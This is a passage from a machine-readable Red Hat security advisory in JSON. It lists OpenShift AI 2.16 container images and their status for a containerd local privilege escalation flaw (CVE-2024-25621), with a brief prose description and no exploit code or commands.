"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64 as a component of Red Hat OpenShift AI 2.16",
"product_id": "Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-25621",
"cwe": {
"id": "CWE-279",
"name": "Incorrect Execution-Assigned Permissions"
},
"discovery_date": "2025-11-06T19:01:04.402278+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2413190"
}
],
"notes": [
{
"category": "description",
"text": "A local privilege escalation vulnerability has been discovered in containerd. This vulnerability is the result of an overly broad default permission which allows local users on the host to potentially access the metadata store, the content store and the contents of Kubernetes local volumes. The contents of volumes might include setuid binaries, which could allow a local user on the host to elevate privileges on the host.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/containerd/containerd: containerd local privilege escalation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-25621"
},
